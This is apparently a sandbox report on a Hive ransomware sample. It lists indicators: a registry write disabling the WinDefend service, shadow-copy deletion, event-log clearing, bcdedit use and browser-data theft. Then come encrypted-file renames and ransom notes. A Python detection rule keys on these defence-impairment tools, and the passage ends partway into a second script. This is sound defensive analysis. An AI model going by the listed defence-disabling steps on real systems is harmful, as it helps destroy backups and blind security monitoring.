Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-sg7hgachf6
Target d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample
SHA256 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f

Threat Level: Known bad

The file d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Hive

Modifies security service

Deletes Windows Defender Definitions

Deletes shadow copies

Clears Windows event logs

Modifies boot configuration data using bcdedit

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 15:06

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 15:06

Reported

2022-01-12 15:06

Platform

win10-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 15:06

Reported

2022-01-12 15:10

Platform

win7-en-20211208

Max time kernel

117s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

MpCmdRun.exe is Defender's own command-line utility; the report records that the sample launched it but not the arguments it was given.

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A

Start = 4 is SERVICE_DISABLED: the change stops the WinDefend service from starting again after its next stop or a reboot rather than terminating the running instance. The sandbox records reg.exe's registry write but not its command line.
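The registry write above, together with the wevtutil.exe, vssadmin.exe, bcdedit.exe, wmic.exe, sc.exe and net.exe launches listed further down, is the defence-impairment burst that precedes encryption. The script below is an added example, not part of this report or of the sandbox's own signatures, showing how that pattern can be matched in process-creation and registry telemetry. The event records are constructed to resemble the behavioral1 run (PID 944 is the sample's PID in the report); the field names, the reg.exe PID, the timestamps, the 60-second window and the three-tool threshold are all assumptions.

```python
"""Match a Hive-style defence-impairment burst in process and registry telemetry.

Added example; it is not part of the sandbox report or of any vendor's
detection content. EVENTS is constructed to resemble the behavioral1 run
(PID 944 is the sample's PID in the report; timestamps, the reg.exe PID and
the field names are assumptions).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Images the report attributes to the sample's child processes. Each is a
# legitimate Windows tool; the signal is several of them spawned by the same
# non-system parent inside a short window, not any single launch.
LOLBIN_TAGS = {
    "reg.exe": "modify-service-config",
    "mpcmdrun.exe": "defender-definitions",
    "wevtutil.exe": "clear-event-logs",
    "vssadmin.exe": "shadow-copies",
    "wmic.exe": "wmi-or-shadow-copies",
    "bcdedit.exe": "boot-config",
    "sc.exe": "service-control",
    "net.exe": "net-command",
}
DISABLED_START = 4  # SERVICE_DISABLED, the value reg.exe wrote in the report


def image_name(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def registry_hits(events):
    """Registry-set events that disable the WinDefend service.

    Accepts both the ControlSet001 path the sandbox reports and the
    CurrentControlSet alias a live system shows.
    """
    hits = []
    for ev in events:
        if ev.get("type") != "registry_set":
            continue
        key = ev["reg_key"].lower()
        if key.endswith("\\services\\windefend\\start") and int(ev["reg_value"]) == DISABLED_START:
            hits.append(ev)
    return hits


def lolbin_bursts(events, window=timedelta(seconds=60), min_distinct=3):
    """Parents that launched at least `min_distinct` different tools from
    LOLBIN_TAGS within `window`. Returns {parent_pid: sorted tag list}."""
    by_parent = defaultdict(list)
    for ev in events:
        if ev.get("type") != "process_create":
            continue
        tag = LOLBIN_TAGS.get(image_name(ev["image"]))
        if tag:
            by_parent[ev["ppid"]].append((ev["ts"], tag))
    bursts = {}
    for ppid, launches in by_parent.items():
        launches.sort()
        for i, (t0, _) in enumerate(launches):  # sliding window from each launch
            tags = {tag for t, tag in launches[i:] if t - t0 <= window}
            if len(tags) >= min_distinct:
                bursts[ppid] = sorted(tags)
                break
    return bursts


def assess(events):
    """Combine both rules. A WinDefend disable written by a child of a
    bursting parent is the strongest signal; either alone is still worth a look."""
    parent_of = {ev["pid"]: ev["ppid"] for ev in events if ev.get("type") == "process_create"}
    bursts = lolbin_bursts(events)
    reg = registry_hits(events)
    reg_parents = {parent_of.get(ev["pid"]) for ev in reg}
    if bursts and reg_parents & set(bursts):
        verdict = "ransomware-like defence impairment"
    elif bursts or reg:
        verdict = "suspicious"
    else:
        verdict = "no match"
    return {"verdict": verdict, "bursts": bursts, "registry_hits": len(reg)}


T0 = datetime(2022, 1, 12, 15, 6, 0)  # assumed; the report gives only the submission minute
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"


def proc(sec, pid, ppid, image, parent=SAMPLE):
    return {"type": "process_create", "ts": T0 + timedelta(seconds=sec),
            "pid": pid, "ppid": ppid, "image": image, "parent_image": parent}


EVENTS = [  # constructed telemetry shaped like the behavioral1 run
    proc(0, 468, 944, r"C:\Windows\system32\net.exe"),
    proc(2, 1288, 944, r"C:\Windows\system32\sc.exe"),
    proc(5, 1500, 944, r"C:\Windows\system32\reg.exe"),
    {"type": "registry_set", "ts": T0 + timedelta(seconds=5), "pid": 1500,
     "reg_key": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start", "reg_value": "4"},
    proc(8, 1520, 944, r"C:\Windows\system32\wevtutil.exe"),
    proc(9, 1540, 944, r"C:\Windows\system32\vssadmin.exe"),
    proc(10, 1560, 944, r"C:\Windows\system32\bcdedit.exe"),
    # an administrator running a single tool from cmd.exe does not trip the burst rule
    proc(600, 2000, 1200, r"C:\Windows\system32\sc.exe", parent=r"C:\Windows\system32\cmd.exe"),
]

if __name__ == "__main__":
    print(assess(EVENTS))
```

The burst rule keys on image names only because this report records the child images but not their arguments; where command lines are available, matching them tightens the rule considerably and reduces the false positives from administrators who legitimately run these tools.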

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Two separate bcdedit.exe runs; the report does not record their arguments.

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRINTL32.DLL.IDX_DLL.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21305_.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RIPPLE\THMBNAIL.PNG.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLNOTER.FAE.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287020.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14515_.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6B.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ACCTBOX.POC.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.XML.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\access\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\mscss7cm_es.dub.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Pacific\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00913_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana.css.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PROGRAM.DPV.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\slideShow.js C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\Bdfn_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe N/A
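The table above shows three kinds of file-system artefact: files renamed to <original name>.<56-character blob>.7j45q, a Bdfn_HOW_TO_DECRYPT.txt note created per directory, and files (.mui, .css, .js, .png, .bmp, .jtp) opened for modification but not renamed within the capture. The script below is an added example, not code from the report or from the sandbox, that classifies a file listing into those three groups and summarises the naming pattern, including the part of the appended blob that is constant across every renamed file and the short tail that varies. The listing is a subset of paths copied from the table; the regex, the function names and the minimum blob length are assumptions, and the script makes no claim about what the blob encodes.

```python
"""Classify a file listing into Hive-style encryption artefacts.

Added example, not code from the report or the sandbox. LISTING is a subset
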